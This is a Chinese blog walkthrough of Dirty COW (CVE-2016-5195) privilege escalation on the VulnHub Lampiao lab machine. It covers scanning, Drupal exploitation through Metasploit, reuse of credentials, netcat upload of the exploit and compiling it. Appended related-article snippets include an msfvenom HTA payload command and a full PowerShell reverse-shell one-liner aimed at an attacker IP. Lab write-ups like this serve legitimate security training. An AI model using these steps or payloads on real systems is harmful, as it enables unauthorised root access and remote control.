以lampiao为靶机,复现脏牛提权

最新推荐文章于 2025-01-18 20:37:44 发布
原创 最新推荐文章于 2025-01-18 20:37:44 发布 · 1.8k 阅读 · 36 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全 #安全

脏牛提权复现

脏牛(Dirty Cow)是Linux内核的一个提权漏洞,之所以叫Dirty Cow,Linux内核的内存子系统在处理写入复制(copy-on-write, cow)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限。

脏牛的CVE编号是CVE-2016-5195。

“Dirty Cow”缺陷存在于Linux内核的一部分,内核是每个发行版的一部分开源操作系统,包括
RedHat,Debian,发布的Ubuntu,差不多有十年了。最重要的是,研究人员指出“Dirty Cow”的漏洞攻击代码,正在积极利用。“Dirty Cow”可能允许任何安装恶意程序获得行政(root) 完全访问设备的权限和劫持。这个地方借助靶机Lampiao来演示具体提权流程。

脏牛提权脚本:https://github.com/gbonacini/CVE-2016-5195

靶机下载地址:https://mega.nz/file/aG4AAaDB#CBLRRYQsAhTOyPJqyjC0Blr-weMH9QMdYbPfMj0LGeM

存活主机发现

Kali ip ===> 192.168.15.100

  • 命令:nmap -sP 192.168.15.0/24

在这里插入图片描述

对目标IP地址进行端口扫描

  • 命令:nmap -p1-65535 192.168.15.107

在这里插入图片描述

发现开放了3个端口,分别是22、80、1898端口

访问开放端口

80端口:

在这里插入图片描述

1989端口:

在这里插入图片描述

相比较于80端口,这个端口所显示的信息更多,我们进行一下信息收集,发现以下信息

在这里插入图片描述

MSF

这里msf搜索drupal

在这里插入图片描述

使用第一个模块进行攻击

在这里插入图片描述

直接获取到meterpreter,getuid发现不是管理员权限

在这里插入图片描述

信息收集

输入ls -l,以此进入以下文件

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

发现了有个配置文件,进去查看,发现以下信息

在这里插入图片描述

找到用户名

在这里插入图片描述

这里我们尝试使用账号:tiago,密码:Virgulino,进行登录

因为之前看到开启了22端口,我们这里尝试ssh远程登录,登录进去了!!!但是不是管理员权限,所以接下来就是提权

在这里插入图片描述

提权

怎么确定是否存在脏牛提权呢?

通过uname -a命令来看:如果内核版本低于以下版本说明存在

Centos7 /RHEL7 3.10.0-327.36.3.el7
Cetnos6/RHEL6 2.6.32-642.6.2.el6
Ubuntu 16.10 4.8.0-26.28
Ubuntu 16.04 4.4.0-45.66
Ubuntu 14.04 3.13.0-100.147
Debian 8 3.16.36-1+deb8u2
Debian 7 3.2.82-1

在这里插入图片描述

说明存在脏牛提权漏洞,那么我们就准备脚本 ===> 脚本获取连接在最下方

利用nc上传文件到目标靶机

首先我们先进行监听

nc -l 9527 > CVE-2016-5195-master.zip

然后上传目标文件到靶机

nc 192.168.15.107 9527 < CVE-2016-5195-master.zip

查看目标靶机是否存在此文件 (再另起一个终端去上传!!!)

在这里插入图片描述

上传

nc 192.168.15.107 9527 < 1.tar.gz

在这里插入图片描述

解压然后编译

unzip CVE-2016-5195-master.zip
cd CVE-2016-5195-master
make

运行下图这个文件

在这里插入图片描述

得到密码:dirtyCowFun

在这里插入图片描述

提权成功!!!

在这里插入图片描述

Linux本地漏洞复现(CVE-2016-5195、Linux、Android、)
墨痕诉清风的博客
02-25 1044
该漏洞具体为,get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。2.将exp一下载到本地,使用gcc -pthread dirty.c -o dirty -lcrypt。命令查看linux内核信息,发现在漏洞范围内,可以进行测试。命令对dirty.c进行编译,生成一个dirty的可执行文件。假设一开始获得的是普通用户bee的限。命令,即可进行
Linux漏洞复现(CVE-2016-5195)
小千安全
05-06 955
漏洞是一个严重的漏洞,可以允许攻击者获得管理员限。为了保护系统的安全,请及时更新内核并采取其他安全措施。
Kali Vulnhub-lampiao(dirtyCow)漏洞复现
牛奶栗的小博客
09-27 5500
​vulnhub和vulhub不同,无需安装环境。 lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249。 下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式...
靶机Lampiao
10-02 1797
同样,将下载好的EXP,上传至目标靶机中,然后msf进入shell,然后编译成可执行文件,利用python开一个模拟终端,开启终端相当于ssh连接(通俗理解),有一个交互式连接。发现是Drupal的网站,查找相关的漏洞,存在远程代码执行的漏洞,msf中带有payload直接利用,设置攻击ip和端口,运行即可。可以看出,真正拿下Linux,限还是不够,对Linux进行信息收集,查看可以用的漏洞,并限至root。扫描靶机的端口,查看开放了哪些端口,发现1898端口开放,尝试访问。
靶机复现
tubug的博客
03-26 4735
漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号的CVE编号是CVE-2016-5195。漏洞危害低限用户利用该漏洞技术可以在全版本Linux系统上实现本地漏洞原理。
Linux漏洞(CVE-2016-5195)复现
qq_40898302的博客
04-02 2327
漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。【影响版本】:该漏洞在全版本Linux系统(Linux kernel >= 2.6.22)均可以实现,受影响的镜像版本为:CentOS 5.x 32位/64位CentOS 6.x 32位/64位CentOS 7.x 32位/64位CoreOS 717.3.0 64位。
vulnhub靶场【Lampiao靶机】,主要考察
China_I_LOVE的博客
01-18 843
靶机考察以下几点:对于博客型网站,可能作者在编写时存在信息泄露,或者说对于参数设置不当,导致可以通过设置参数发现隐藏信息对于msf的使用,当发现网站CMS的版本信息等时,可以测试一下有无版本漏洞对于靶机内的系统信息,当发现版本信息及内核版本后,使用搜索,当都测试发现无可利用时,适当的放宽条件,比如只指定内核信息,或者只指定操作系统信息等。或者借助工具进行自动化的审计,当发现适合的方式后,就可以进行一个个的测试。
vulnhub lampiao靶机 Linux
weixin_51441054的博客
04-04 3372
首先我们打开靶机,发现需要登录 利用kali作为攻击机,先扫描其ip地址,kali ip为192.168.142.134,因为在同一局域网下,用nmap扫描 得到靶机ip为192.168.142.136,访问80端口 再进一步扫描端口 得到一个1898端口,貌似是主页 发现cms信息 利用msf进行漏洞利用 攻击成功,得到一个普通用户限 上传一个探测Linux漏洞的探针 发现没有Perl,不能运行,换一个探针...
VulnHub--Lampiao-linux漏洞
记录笔记
07-06 1178
vulnhub-靶场--lampiao
靶机
m0_73482536的博客
05-10 314
练习的靶机
Linux漏洞 CVE-2016-5195 Vulnhub靶场
weixin_62591194的博客
07-08 861
【漏洞复现】Linux(CVE-2016-5195 vulnhub)
复现以及如何得到一个完全交互的shell1
08-03
1、上传EXP,注意上传到/tmp 这种可读可写的件夹 1、在攻击机上开启nc监听 1、添加户,先adduser命令添加个普通户,命令如下: 2、赋予ro
漏洞复现- - -CVE-2016-5195 Dirty Cow漏洞
weixin_67503304的博客
11-02 4961
本文主要讲解了漏洞的全过程及其修复建议。
lampiao靶场---
m0_66908617的博客
05-11 626
渗透测试前期准备攻击机:192.168.71.235(kali系统)靶机:192.168.71.191漏洞复现
lampiao靶机-
m0_63028223的博客
07-18 1412
dirb扫描出来很多敏感目录,泄露许多敏感信息。发现有很多漏洞,sql注入了,远程代码执行什么的。访问80端口没什么收获,访问1898端口。发现没有sudo可以使用的命令。Drupal7框架。拿到root账户密码。...
Linux漏洞复现
热门推荐
wangyuxiang946的博客
07-22 2万+
操作系统: Linux ( CentOS 6.5)Web服务: PHP+Apache
DirtyCow漏洞复现(CVE-2016-5195)
tpaer的博客
11-16 2990
本文以vulnhub靶场中的lampiao为例复现漏洞
vulnhub--lampiao
鲨鱼辣椒的博客
08-03 5025
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
Dirty COW漏洞原理与简单利用
Ray的博客
05-20 1万+
我将分为3个部分进行介绍,包括:漏洞的概述,漏洞的成因以及漏洞的利用。 首先是漏洞概述: Dirty COW漏洞是一种发生在写时复制的竞态条件漏洞,它影响所有基于Linux的操作系统,包括Android,这个漏洞2007年起就存在于Linux内核中,直到2016年才被发现和修复。可以利用这个漏洞修改受保护的文件,也可以利用这个漏洞。 Dirty COW漏洞是发生在写时复制的竞态条件漏洞,我们先看看什么是竞态条件和写时复制。 竞态条件是指一个系统或者进程的输出依赖于不受控制的事件出现顺序或者出现时
windows靶机反弹shell及
最新发布
02-19
### Windows 靶机反弹 Shell 和方法 #### 一、使用 Metasploit 实现反弹 Shell 为了创建一个可以用于反弹 Shell 的 payload 文件,可以通过 `msfvenom` 工具来完成。对于 Windows 系统而言,假设目标机器支持 x64 架构,则可采用如下命令生成 HTA 格式的 Payload: ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=<vps_ip> LPORT=9090 -f hta-psh -o 1.hta ``` 此操作将会把生成的恶意文件保存为名为 "1.hta" 的文件[^3]。 当受害者访问这个 .hta 文件时,它会在受害者的计算机上执行并尝试连接到指定 IP 地址和端口上的监听器,从而建立反向 Shell 连接。 #### 二、通过 Netcat (nc) 创建简单 TCP 反弹 Shell 另一种较为基础的方式是在攻击者控制下的设备上启动监听服务,并让目标主机发送回连接请求。具体做法如下所示: - 攻击方设置好监听状态:`nc -lvp 4444` - 被控端执行相应指令以发起连接:`powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.41.142',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"` 上述 PowerShell 命令能够供更稳定的交互环境给攻击者[^2]。 #### 三、关于过程中的注意事项 一旦获得了初始级别的 Shell 访问限之后,下一步通常是试图升至更高层次的操作系统特级别。然而,在实际操作中需要注意以下几个方面的问题: - **网络配置**:确认攻击机与靶机处于相同网段内; - **架构匹配度**:确保所使用的 exploit 或 payload 符合目标系统的 CPU 类型(即 32-bit vs 64-bit),这可通过运行 `systeminfo` 来获取信息; - **持续性维护会话**:在整个渗透测试期间维持稳定的目标系统在线状况; - **漏洞适用范围**:考虑到某些安全更新可能已经修复了特定类型的弱点,因此应当针对未修补版本实施攻击策略; 最后一步是验证是否成功升了限等级,通常情况下可以借助于调用 `whoami` 或类似的内置工具来进行检查。如果显示的结果表明当前是以管理员身份登录的话,则说明操作顺利完成[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值